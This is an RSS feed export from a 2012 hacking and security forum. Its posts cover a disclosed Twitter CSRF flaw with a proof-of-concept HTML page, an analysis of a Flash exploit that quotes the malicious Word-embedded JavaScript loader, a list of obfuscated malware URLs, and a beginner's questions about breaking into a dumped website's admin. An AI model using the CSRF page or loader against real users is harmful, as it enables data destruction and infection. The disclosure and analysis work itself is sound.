<?xml version="1.0" encoding="ISO-8859-1"?>

<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/">
	<channel>
		<title>Garage4hackers Forum</title>
		<link>http://www.garage4hackers.com/</link>
		<description>This is a discussion forum releated to Hacking, Security, network and system security http://www.garage4hackers.com</description>
		<language>en</language>
		<lastBuildDate>Fri, 18 May 2012 10:01:13 GMT</lastBuildDate>
		<generator>vBulletin</generator>
		<ttl>60</ttl>
		<image>
			<url>http://www.garage4hackers.com/images/misc/rss.png</url>
			<title>Garage4hackers Forum</title>
			<link>http://www.garage4hackers.com/</link>
		</image>
		<item>
			<title>Research Resources for MS SharePoint</title>
			<link>http://www.garage4hackers.com/f11/research-resources-ms-sharepoint-2320.html</link>
			<pubDate>Fri, 18 May 2012 06:55:25 GMT</pubDate>
			<description>This page contains research notes on Microsoft’s SharePoint MOSS and WSS. 
 
Link: 
https://www.owasp.org/index.php/Research_for_SharePoint_%28MOSS%29</description>
			<content:encoded><![CDATA[<div><div style="direction:ltr;overflow:false;height:24px;float:left;">
<script type="text/javascript" src="http://apis.google.com/js/plusone.js"></script><g:plusone size="small" count="false"></g:plusone>
 <!--Twitter button starts--><a href="http://twitter.com/share" class="twitter-share-button" data-count="none" data-via="garage4hackers" data-url="http://www.garage4hackers.com/external.php?t=2320&amp;postcount=">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script><!--Twitter button ends-->
 <!--Facebook button starts--><iframe src="http://www.facebook.com/widgets/like.php?href=http://www.garage4hackers.com/external.php?t=2320&amp;postcount=&amp;layout=button_count&amp;show_faces=false" scrolling="no" frameborder="0" style="border:none; width:47px; height:22px;overflow: hidden;"></iframe><!--Facebook button ends-->
</div><br><br>This page contains research notes on Microsoft’s SharePoint MOSS and WSS.<br />
<br />
Link:<br />
<a href="https://www.owasp.org/index.php/Research_for_SharePoint_%28MOSS%29" target="_blank">https://www.owasp.org/index.php/Rese...int_%28MOSS%29</a></div>

]]></content:encoded>
			<category domain="http://www.garage4hackers.com/f11/">Web Application Penetration Testing</category>
			<dc:creator>amolnaik4</dc:creator>
			<guid isPermaLink="true">http://www.garage4hackers.com/f11/research-resources-ms-sharepoint-2320.html</guid>
		</item>
		<item>
			<title>About Admin</title>
			<link>http://www.garage4hackers.com/f11/about-admin-2317.html</link>
			<pubDate>Thu, 17 May 2012 05:38:00 GMT</pubDate>
			<description>Hi all, 
 
Im a new comer :D in this community, btw I want to ask something that always bother me. If you know about this please answer it  
1. I...</description>
			<content:encoded><![CDATA[<div>Hi all,<br />
<br />
Im a new comer :D in this community, btw I want to ask something that always bother me. If you know about this please answer it <br />
1. I hacking some website but after I make a long searching &amp; dump the website database I just cant get the admin password, It is mean that some website dont store the password and username in the website database?<br />
<br />
2. It's is true that some website dont have the admin login page? I already seaching it with 6k dork of admin page but it just dont have it, but I scan the website I found the FTP port is open, it is the admin of the website enter the database using FTP? or other method? o.0<br />
<br />
I give you and example website that look like what im talking: <u>xxxx</u> Note: This website has Admin password but I just cant enter their database using that password.<br />
<br />
Thanks, If you know about this please tell me.</div>

]]></content:encoded>
			<category domain="http://www.garage4hackers.com/f11/">Web Application Penetration Testing</category>
			<dc:creator>hazard74</dc:creator>
			<guid isPermaLink="true">http://www.garage4hackers.com/f11/about-admin-2317.html</guid>
		</item>
		<item>
			<title>Hi</title>
			<link>http://www.garage4hackers.com/f7/hi-2316.html</link>
			<pubDate>Thu, 17 May 2012 05:36:15 GMT</pubDate>
			<description>Hi all im new here, hope I can learn with you guys ^__^ 
 
CHeers</description>
			<content:encoded><![CDATA[<div>Hi all im new here, hope I can learn with you guys ^__^<br />
<br />
CHeers</div>

]]></content:encoded>
			<category domain="http://www.garage4hackers.com/f7/">Introduce Your Self</category>
			<dc:creator>hazard74</dc:creator>
			<guid isPermaLink="true">http://www.garage4hackers.com/f7/hi-2316.html</guid>
		</item>
		<item>
			<title>Help required in decoding suspicious  URL</title>
			<link>http://www.garage4hackers.com/f17/help-required-decoding-suspicious-url-2312.html</link>
			<pubDate>Wed, 16 May 2012 09:24:18 GMT</pubDate>
			<description>Hi Group, 
Need your help on understanding and decoding these URLs that i have got from my proxy.These URLs seems to be obfuscated. Appreciate If...</description>
			<content:encoded><![CDATA[<div>Hi Group,<br />
Need your help on understanding and decoding these URLs that i have got from my proxy.These URLs seems to be obfuscated. Appreciate If anyone could help me in decoding these URLs.<br />
<br />
sample of urls:<br />
<br />
<a href="http://i-e-g-n-9-p-2-5-0-9-1-1-b-h-9-d-4-t-0-g-1-q-q-1-i-i-0-0-y-f-k-.i-9t3-sy-7i-5j3-sf7-8z5-54-n8v7r-0-ih7-36992m-o3-0q-g-3.info/VERSION.TXT" target="_blank">http://i-e-g-n-9-p-2-5-0-9-1-1-b-h-9...fo/VERSION.TXT</a><br />
<a href="http://3-4-c-9-9-f-2-3-2-6-6-q-j-2-5-d-7-j-0-s-v-6-c-q-f-4-6-q-b-w-b-.81r-x7-tr2p-7c-5lk-huxs-0wq-bma-0wvi-2y-a8s-elw-hv-o0-6.info/VERSION.TXT" target="_blank">http://3-4-c-9-9-f-2-3-2-6-6-q-j-2-5...fo/VERSION.TXT</a><br />
<a href="http://v-q-z-q-y-1-o-n-8-u-q-9-v-d-x-y-0-9-2-2-y-0-9-o-x-5-l-f-j-a-5-.0-0-0-0-0-0-0-0-0-0-0-0-0-60-0-0-0-0-0-0-0-0-0-0-0-0-0.info/VERSION.TXT" target="_blank">http://v-q-z-q-y-1-o-n-8-u-q-9-v-d-x...fo/VERSION.TXT</a><br />
<a href="http://8-n-9-0-f-f-u-3-9-0-y-n-9-m-9-1-o-2-o-h-k-r-a-m-1-6-y-i-g-2-0-.rb-e-e3-j-fi-1-il-h-il-3e-z-u-r-u-lk-h-wm-3-6-g-0o-s-dx.info/VERSION.TXT" target="_blank">http://8-n-9-0-f-f-u-3-9-0-y-n-9-m-9...fo/VERSION.TXT</a><br />
<a href="http://4-e-q-o-8-y-w-i-3-r-0-p-q-o-5-5-k-2-p-9-1-8-0-b-z-q-v-0-t-8-s-.z-hk-yl8-k-7o-8z-l-v-uhb-u-td-8i-oe-0gp-e2g-we6-ws-2vpd.info/VERSION.TXT" target="_blank">http://4-e-q-o-8-y-w-i-3-r-0-p-q-o-5...fo/VERSION.TXT</a><br />
<a href="http://s-4-r-d-7-j-m-9-0-9-1-2-5-2-7-4-e-o-6-s-j-o-1-a-u-1-5-z-4-s-1-.5-68-wk-5g-z2-pu6-e5x-4h-yij-yx-duv-wpx-2r8-7vc-ox-4q-u.info/VERSION.TXT" target="_blank">http://s-4-r-d-7-j-m-9-0-9-1-2-5-2-7...fo/VERSION.TXT</a><br />
<br />
Regards</div>

]]></content:encoded>
			<category domain="http://www.garage4hackers.com/f17/">Computer Forensics and Incident Handling</category>
			<dc:creator>Immaturedevil</dc:creator>
			<guid isPermaLink="true">http://www.garage4hackers.com/f17/help-required-decoding-suspicious-url-2312.html</guid>
		</item>
		<item>
			<title>Twitter Wipe Address Book CSRF Vulnerability</title>
			<link>http://www.garage4hackers.com/f11/twitter-wipe-address-book-csrf-vulnerability-2311.html</link>
			<pubDate>Wed, 16 May 2012 09:09:57 GMT</pubDate>
			<description>I disclosed a CSRF vulnerability (https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29) with Twitter, that could allow a malicious...</description>
			<content:encoded><![CDATA[<div>I disclosed a <a href="https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29" target="_blank">CSRF vulnerability</a> with Twitter, that could allow a malicious attacker to wipe the address book of an unsuspecting user. I reported the vulnerability in the beginning of March and they fixed it on the 22nd! I wouldn't want to comment on the process and internal business logic that they follow, but honestly that was a a pretty long period for them to come up with a fix.<br />
<br />
Anyways, getting to the vulnerability, the issue was that a user could delete his own address book with a single click URL, which is alright as long as the user wishes to do so himself. However, with the server not verifying whether the request was sent by the user himself or was the user was tricked into sending the request, the application allowed an attacker to generate a request on behalf of a logged in user from the user's browser and perform the action (deletion of the address book).<br />
<br />
The normal process would be as follows:<br />
1. A user logs into mobile.twitter.com<br />
2. If he wants to delete his address book, he would click on Delete Address Book under settings.<br />
3. Upon clicking, a GET request is sent to &quot;https://mobile.twitter.com/settings/wipe_addressbook&quot;<br />
4. A message is presented that the the user's contacts have been removed.<br />
<br />
<a href="http://www.garage4hackers.com/attachments/f11/363-twitter-wipe-address-book-csrf-vulnerability-twitteraddressbookwipe.jpg"  title="Name:  
Views: 
Size:  ">Attachment 363</a><br />
<br />
An attacker could take advantage of the absence of any security tokens (CSRF tokens) that would allow the server to authenticate the request and setup a page (and host it on xyz.com/index.html) similar to the following:<br />
<br />
&lt;html&gt;<br />
&lt;body&gt;<br />
&lt;img src=&quot;https://mobile.twitter.com/settings/wipe_addressbook&quot; width=&quot;0&quot; height=&quot;0&quot; /&gt;<br />
&lt;/body&gt;<br />
&lt;/html&gt;<br />
<br />
An attacker could then be made to navigate to xyz.com/index.html (via email or some other means) and his address book would be deleted!<br />
 <br />
The form that would make the final request has now been protected with a 'authenticity_token' which is random and changes on every login and without which the request is not processed on the server. An attacker would need to know this value to attack the application via CSRF.<br />
<br />
<a href="http://www.garage4hackers.com/attachments/f11/364-twitter-wipe-address-book-csrf-vulnerability-new_form_with_csrf_protection.jpg"  title="Name:  
Views: 
Size:  ">Attachment 364</a><br />
<br />
This was my ticket to the Twitter Hall of Fame for Security researchers at <a href="http://twitter.com/about/security" target="_blank">Twitter / Security</a>!</div>


	<div style="padding:10px">

	

	
		<fieldset class="fieldset">
			<legend>Attached Images</legend>
			<div style="padding:10pxpx">
			<img class="attach" src="http://www.garage4hackers.com/attachments/f11/363d1337159219-twitter-wipe-address-book-csrf-vulnerability-twitteraddressbookwipe.jpg" alt="" />&nbsp;<img class="attach" src="http://www.garage4hackers.com/attachments/f11/364d1337159292-twitter-wipe-address-book-csrf-vulnerability-new_form_with_csrf_protection.jpg" alt="" />&nbsp;
			</div>
		</fieldset>
	

	

	

	</div>
]]></content:encoded>
			<category domain="http://www.garage4hackers.com/f11/">Web Application Penetration Testing</category>
			<dc:creator>karniv0re</dc:creator>
			<guid isPermaLink="true">http://www.garage4hackers.com/f11/twitter-wipe-address-book-csrf-vulnerability-2311.html</guid>
		</item>
		<item>
			<title>Portable Executable 101 – a windows executable walkthrough</title>
			<link>http://www.garage4hackers.com/f24/portable-executable-101-%96-windows-executable-walkthrough-2306.html</link>
			<pubDate>Tue, 15 May 2012 04:01:07 GMT</pubDate>
			<description>This graphic (PDF JPG) is a walkthrough of a simple windows executable, that shows its dissected structure and explains how it’s loaded by the...</description>
			<content:encoded><![CDATA[<div>This graphic (PDF JPG) is a walkthrough of a simple windows executable, that shows its dissected structure and explains how it’s loaded by the operating system.<br />
<br />
Link:<br />
<a href="http://code.google.com/p/corkami/wiki/PE101?show=content" target="_blank">PE101</a><br />
<br />
AMol NAik</div>

]]></content:encoded>
			<category domain="http://www.garage4hackers.com/f24/">Reverse Engineering and Application Cracking</category>
			<dc:creator>amolnaik4</dc:creator>
			<guid isPermaLink="true">http://www.garage4hackers.com/f24/portable-executable-101-%96-windows-executable-walkthrough-2306.html</guid>
		</item>
		<item>
			<title>How to install metasploitable on virtual box?</title>
			<link>http://www.garage4hackers.com/f30/how-install-metasploitable-virtual-box-2304.html</link>
			<pubDate>Sat, 12 May 2012 16:15:49 GMT</pubDate>
			<description>Hello, 
            I would like to know how to install metasploitable on virtual box? iam using new version of virtual box which lacks add feature...</description>
			<content:encoded><![CDATA[<div>Hello,<br />
            I would like to know how to install metasploitable on virtual box? iam using new version of virtual box which lacks add feature in virtual media manager,<br />
please suggest me, thanks in advance.<br />
<br />
Regards.</div>

]]></content:encoded>
			<category domain="http://www.garage4hackers.com/f30/">Hacking for Beginners</category>
			<dc:creator>skorpinok</dc:creator>
			<guid isPermaLink="true">http://www.garage4hackers.com/f30/how-install-metasploitable-virtual-box-2304.html</guid>
		</item>
		<item>
			<title>Performing Android malware analysis</title>
			<link>http://www.garage4hackers.com/f25/performing-android-malware-analysis-2301.html</link>
			<pubDate>Fri, 11 May 2012 16:36:10 GMT</pubDate>
			<description>Just wrote a short article and related methodologies to analyze malicious Android applications. It can be read from the link below: 
 
Performing...</description>
			<content:encoded><![CDATA[<div>Just wrote a short article and related methodologies to analyze malicious Android applications. It can be read from the link below:<br />
<br />
<a href="http://blog.secfence.com/2012/05/performing-android-malware-analysis/" target="_blank">Performing Android malware analysis | Secfence Blog</a></div>

]]></content:encoded>
			<category domain="http://www.garage4hackers.com/f25/"><![CDATA[Botnets, Malwares & Rootkits Analysis]]></category>
			<dc:creator>prashant_uniyal</dc:creator>
			<guid isPermaLink="true">http://www.garage4hackers.com/f25/performing-android-malware-analysis-2301.html</guid>
		</item>
		<item>
			<title>CVE-2012-0779 - Flash Player Exploit</title>
			<link>http://www.garage4hackers.com/f24/cve-2012-0779-flash-player-exploit-2300.html</link>
			<pubDate>Fri, 11 May 2012 15:38:32 GMT</pubDate>
			<description>This is regarding a latest Flash Player Exploit which is being used in the wild, mostly being served to victims in the form of Word Documents. 
 
A...</description>
			<content:encoded><![CDATA[<div>This is regarding a latest Flash Player Exploit which is being used in the wild, mostly being served to victims in the form of Word Documents.<br />
<br />
A brief overview before we get to the good stuff:<br />
<br />
A Word Document has the following malicious JavaScript embedded in it:<br />
<br />
<div class="bbcode_container">
	<div class="bbcode_description">Code:</div>
	<hr /><code class="bbcode_code">javascript<b></b>:eval(document.write(unescape('%3Cembed%20src%3Dhttp://example.com/malicious.swf?info=&lt;48 Char Hash&gt;&amp;infosize=&lt;A Dword&gt;%3E%3C/embed%3E')))</code><hr />
</div>This JavaScript can easily be located by viewing the strings of the Word Document. It is encoded but it should be easy to follow that it creates an embed tag as following:<br />
<br />
<div class="bbcode_container">
	<div class="bbcode_description">Code:</div>
	<hr /><code class="bbcode_code">&lt;embed src=&quot;http://example.com/malicious.swf?info=&lt;48 Char Hash&gt;&amp;infosize=&lt;A Dword&gt;&quot;&gt;&lt;/embed&gt;</code><hr />
</div>Apart from the above malicious JavaScript, you will also find a payload present inside the Word Document. The MZ and PE Signatures are XOR Encrypted using a Byte. It can be easily retrieved using OfficeMalScanner.<br />
<br />
It will bruteforce the XOR Key and dump the embedded payload. You may find only 1 binary or even multiple binaries.<br />
<br />
When you open the MS Word Document, it will connect to the URL mentioned in the SRC Attribute of the Embed tag and fetch a SWF File. This in turn will spray the Process Heap with shellcode and trigger the vulnerability in Flash Player, thereby redirecting the execution to shellcode sprayed over the heap.<br />
<br />
This shellcode will locate the payload present inside the Word Document.<br />
<br />
Now, let's focus on the SWF file. You can fetch a SWF File from Contagio here:<br />
<br />
<a href="http://contagiodump.blogspot.in/2012/05/may-3-cve-2012-0779-world-uyghur.html" target="_blank">http://contagiodump.blogspot.in/2012...ld-uyghur.html</a><br />
<br />
Thanks Mila :)<br />
<br />
The SWF file is compressed as you can see from the magic bytes (CWS).<br />
<br />
It is also encrypted using DoSWF version 5.0.3. This information can be found in the RDF Metadata of the decompressed SWF File.<br />
<br />
The decompiled ActionScript is posted on Contagio. It's time to deep dive into the ActionScript.</div>

]]></content:encoded>
			<category domain="http://www.garage4hackers.com/f24/">Reverse Engineering and Application Cracking</category>
			<dc:creator>c0d3inj3cT</dc:creator>
			<guid isPermaLink="true">http://www.garage4hackers.com/f24/cve-2012-0779-flash-player-exploit-2300.html</guid>
		</item>
		<item>
			<title>Nmap O.S Detection Error</title>
			<link>http://www.garage4hackers.com/f30/nmap-o-s-detection-error-2287.html</link>
			<pubDate>Thu, 10 May 2012 18:30:12 GMT</pubDate>
			<description><![CDATA[Hello, 
When i run nmap O.S detection scan for windows xp within Pentest lab, i get this ' Too many fingerprints match this host to give specific OS...]]></description>
			<content:encoded><![CDATA[<div>Hello,<br />
When i run nmap O.S detection scan for windows xp within Pentest lab, i get this ' Too many fingerprints match this host to give specific OS details , i tried this in vmware workstation before it gave me same mesage , however the mac address seems right, i run backtrack 5r2/windows xp sp3 on virtual box. my network configuration: NAT &amp; HOST ONLY for Windows XP &amp; Backtrack 5R2.please suggest me how to solve this ? Thanks in advance.<br />
<br />
scan details:<br />
<br />
nmap -O 192.168.56.103<br />
<br />
Starting Nmap 5.61TEST4 ( <a href="http://nmap.org" target="_blank">Nmap - Free Security Scanner For Network Exploration &amp; Security Audits.</a> ) at 2012-05-05 23:33 GST<br />
Nmap scan report for 192.168.56.103<br />
Host is up (0.00042s latency).<br />
All 1000 scanned ports on 192.168.56.103 are filtered<br />
MAC Address: 08:00:27:C9:67:41 (Cadmus Computer Systems)<br />
Too many fingerprints match this host to give specific OS details<br />
Network Distance: 1 hop<br />
<br />
Regards.</div>

]]></content:encoded>
			<category domain="http://www.garage4hackers.com/f30/">Hacking for Beginners</category>
			<dc:creator>skorpinok</dc:creator>
			<guid isPermaLink="true">http://www.garage4hackers.com/f30/nmap-o-s-detection-error-2287.html</guid>
		</item>
		<item>
			<title>Web Application Hackers Toolchain</title>
			<link>http://www.garage4hackers.com/f11/web-application-hackers-toolchain-2286.html</link>
			<pubDate>Thu, 10 May 2012 06:29:39 GMT</pubDate>
			<description>THis is a nice presentation by Jhaddix on how tool chaining can be useful in better application mapping. 
 
Take a look:...</description>
			<content:encoded><![CDATA[<div>THis is a nice presentation by Jhaddix on how tool chaining can be useful in better application mapping.<br />
<br />
Take a look:<br />
<a href="https://docs.google.com/open?id=0B15XPa08CyxhODIxODNlNjItZDZlNS00YjY4LWJlN2QtZGQwZTliM2VhYmQ4" target="_blank">https://docs.google.com/open?id=0B15...QwZTliM2VhYmQ4</a><br />
<br />
Cheers,<br />
AMol NAik</div>

]]></content:encoded>
			<category domain="http://www.garage4hackers.com/f11/">Web Application Penetration Testing</category>
			<dc:creator>amolnaik4</dc:creator>
			<guid isPermaLink="true">http://www.garage4hackers.com/f11/web-application-hackers-toolchain-2286.html</guid>
		</item>
		<item>
			<title><![CDATA[Pwning a Spammer's Keylogger]]></title>
			<link>http://www.garage4hackers.com/f25/pwning-spammers-keylogger-2281.html</link>
			<pubDate>Wed, 09 May 2012 07:28:05 GMT</pubDate>
			<description><![CDATA[Here is a very good read about how a researcher caught a keylogger and analyzed it upto the point of 
discovering the spammer's server and his...]]></description>
			<content:encoded><![CDATA[<div>Here is a very good read about how a researcher caught a keylogger and analyzed it upto the point of<br />
discovering the spammer's server and his personal details :cool: &gt;&gt;<br />
<br />
<a href="http://blog.spiderlabs.com/2012/04/pwning-a-spammers-keylogger.html?utm_source=feedburner&amp;utm_medium=twitter&amp;utm_campaign=Feed%3A+SpiderlabsAnterior+%28SpiderLabs+Anterior%29" target="_blank">Pwning a Spammer's Keylogger - SpiderLabs Anterior</a></div>

]]></content:encoded>
			<category domain="http://www.garage4hackers.com/f25/"><![CDATA[Botnets, Malwares & Rootkits Analysis]]></category>
			<dc:creator>abhaythehero</dc:creator>
			<guid isPermaLink="true">http://www.garage4hackers.com/f25/pwning-spammers-keylogger-2281.html</guid>
		</item>
		<item>
			<title>Google T-shirt :D</title>
			<link>http://www.garage4hackers.com/f38/google-t-shirt-d-2270.html</link>
			<pubDate>Tue, 08 May 2012 04:42:31 GMT</pubDate>
			<description>Security teams of Google have donated me shirts with corporate logo... proofs of my findings. 
I would like to thank Google Security team, who have...</description>
			<content:encoded><![CDATA[<div>Security teams of Google have donated me shirts with corporate logo... proofs of my findings.<br />
I would like to thank Google Security team, who have helped me to get shirt, I'm grateful for your efforts! ... :)<br />
<br />
Thanks to My g4h Team :) who always support me <br />
<br />
<a href="http://www.garage4hackers.com/attachments/f38/361-google-t-shirt-d-392390_3852608483783_1535400717_33225620_919395084_n.jpg"  title="Name:  
Views: 
Size:  ">Attachment 361</a></div>


	<div style="padding:10px">

	

	
		<fieldset class="fieldset">
			<legend>Attached Images</legend>
			<div style="padding:10pxpx">
			<img class="attach" src="http://www.garage4hackers.com/attachments/f38/361d1336452052-google-t-shirt-d-392390_3852608483783_1535400717_33225620_919395084_n.jpg" alt="" />&nbsp;
			</div>
		</fieldset>
	

	

	

	</div>
]]></content:encoded>
			<category domain="http://www.garage4hackers.com/f38/">Shout-box</category>
			<dc:creator><![CDATA[[s]]]></dc:creator>
			<guid isPermaLink="true">http://www.garage4hackers.com/f38/google-t-shirt-d-2270.html</guid>
		</item>
		<item>
			<title>Python-based malware attack targets Macs. Windows PCs also under fire</title>
			<link>http://www.garage4hackers.com/f8/python-based-malware-attack-targets-macs-windows-pcs-also-under-fire-2269.html</link>
			<pubDate>Tue, 08 May 2012 03:49:37 GMT</pubDate>
			<description>Experts at SophosLabs have identified a new malware attack that is targeting both Mac and Windows computers, exploiting the infamous Java security...</description>
			<content:encoded><![CDATA[<div>Experts at SophosLabs have identified a new malware attack that is targeting both Mac and Windows computers, exploiting the infamous Java security vulnerability that allowed the Flashback botnet to commandeer 600,000 Macs.<br />
.................<br />
......................<br />
..........................<br />
The downloaded programs will then install further malicious code - downloading the Troj/FlsplyBD-A backdoor Trojan on Windows computers, and decrypting a Python script called update.py (extracted from install_flash_player.py) on Mac OS X.<br />
.......................<br />
...........................<br />
<br />
<a href="http://nakedsecurity.sophos.com/2012/04/27/python-malware-mac/" target="_blank">READ Full Story</a></div>

]]></content:encoded>
			<category domain="http://www.garage4hackers.com/f8/"><![CDATA[Security & Hacking News Thread]]></category>
			<dc:creator>neo</dc:creator>
			<guid isPermaLink="true">http://www.garage4hackers.com/f8/python-based-malware-attack-targets-macs-windows-pcs-also-under-fire-2269.html</guid>
		</item>
		<item>
			<title>Network VAPT</title>
			<link>http://www.garage4hackers.com/f40/network-vapt-2266.html</link>
			<pubDate>Mon, 07 May 2012 13:27:38 GMT</pubDate>
			<description>If any one interested to do Network VAPT (Serious Project) then please PM me your Mobile number . Further information i will reply you in PM.  
 
 
...</description>
			<content:encoded><![CDATA[<div>If any one interested to do Network VAPT (Serious Project) then please PM me your Mobile number . Further information i will reply you in PM. <br />
<br />
<br />
<br />
Thanks<br />
<br />
Sandeep</div>

]]></content:encoded>
			<category domain="http://www.garage4hackers.com/f40/">Miscellanous Thread</category>
			<dc:creator><![CDATA[[s]]]></dc:creator>
			<guid isPermaLink="true">http://www.garage4hackers.com/f40/network-vapt-2266.html</guid>
		</item>
	</channel>
</rss>

